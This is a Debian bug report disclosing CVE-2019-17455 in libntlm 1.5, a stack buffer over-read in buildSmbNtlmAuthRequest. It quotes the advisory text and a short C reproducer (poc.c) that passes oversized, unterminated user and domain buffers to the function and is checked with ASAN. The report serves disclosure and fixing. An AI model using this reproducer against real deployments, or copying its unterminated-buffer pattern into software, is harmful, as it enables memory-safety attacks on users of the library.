Source: libntlm Version: 1.5-2 Severity: important Tags: security upstream Forwarded: https://gitlab.com/jas/libntlm/issues/2 Control: found -1 1.5-1
Hi, The following vulnerability was published for libntlm. CVE-2019-17455[0]: | Libntlm through 1.5 relies on a fixed buffer size for | tSmbNtlmAuthRequest, tSmbNtlmAuthChallenge, and tSmbNtlmAuthResponse | read and write operations, as demonstrated by a stack-based buffer | over-read in buildSmbNtlmAuthRequest in smbutil.c for a crafted NTLM | request. If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2019-17455 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17455 [1] https://gitlab.com/jas/libntlm/issues/2 Please adjust the affected versions in the BTS as needed. Reproducer for the issue: ,---- [ poc.c ] | #include<ntlm.h> | #include<stdio.h> | #include<stdlib.h> | #include<string.h> | extern void buildSmbNtlmAuthRequest(tSmbNtlmAuthRequest * request, const char *user, const char *domain); | int main (void) | { | char user[1024]; | char domain[1024]; | memset(user,'a',1024); | memset(domain,'b',1024); | tSmbNtlmAuthRequest request; | tSmbNtlmAuthChallenge challenge; | tSmbNtlmAuthResponse response; | buildSmbNtlmAuthRequest (&request, user, domain); | return 0; | } `---- (copile with ASAN to verify the issue). Regards, Salvatore
